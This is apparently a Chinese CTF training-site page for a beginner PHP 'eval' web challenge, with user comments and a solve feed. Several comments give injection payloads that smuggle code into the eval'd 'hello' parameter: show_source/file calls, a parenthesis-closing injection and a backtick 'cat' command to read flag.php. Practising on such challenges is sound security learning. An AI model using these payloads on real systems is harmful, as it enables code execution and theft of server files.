evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 18642
提  示:
描  述:
eval
评论
luyisie 4年前

file // show_source // highlight_file

回复 0

wwgy9981 4年前

flag = 'Too Young Too Simple‘

回复 2

kavin 4年前

明白了原理,用bp搞了一轮,发现hello=show_source('flag.php')可行

回复 4

kuaiting 4年前

使用?hello=file('flag.php') 或者?hello=show_source('flag.php') 等可以读取源码的函数 或者构造var_dump($a) 闭合

回复 5

陈江川0118 4年前

简单来说就是利用file函数把flag.php的内容存到一个数组中,然后打印出来数组的内容即可

回复 4

trackboy 4年前

?hello=file(%22flag.php%22) ?hello=file_get_contents(%27flag.php%27) ?hello=1);show_source(%27flag.php%27);var_dump( ?hello=);echo%20`cat%20./flag.php`;//

回复 4

lgb236277484 4年前

highlight_file()

回复 0

mingshen 4年前

PHP show_source() 杂项函数,或者file协议读取文件内容

回复 0

linkzoom 4年前

离谱,cat啥啊真的是...

回复 0
ctf20210817 4年前

确实是cat就可以

回复 0

kunge 4年前

基础不牢,地动山摇,以前用过tac,今天怎么也想不起来。感谢使用file()函数哪位大哥,感谢对tac与cat进行分别讲解的大哥,学到了很多

回复 3

WriteUp

image
harry

1 金币

评分(10)

解题动态

Tim.Drake 攻破了该题 3小时前
语默人 攻破了该题 3小时前
frozenfish0x 攻破了该题 10小时前
2212994366 攻破了该题 16小时前
Dayssss 攻破了该题 16小时前
卡面来打123 攻破了该题 1天前
小狗喵喵喵 攻破了该题 1天前
yangyy 攻破了该题 1天前
hdcc1 攻破了该题 1天前
xiaoxiaojiangshi 攻破了该题 1天前
YanC1e 攻破了该题 1天前
假面骑士佟以冬 攻破了该题 1天前
K-423 攻破了该题 2天前
rourou 攻破了该题 2天前
zzxmxlmz123 攻破了该题 2天前
爆汁酸菜鱼 攻破了该题 3天前
bak3l1 攻破了该题 3天前
Arno_Zoffy 攻破了该题 3天前
Newdap 攻破了该题 3天前
dc 攻破了该题 3天前
问题反馈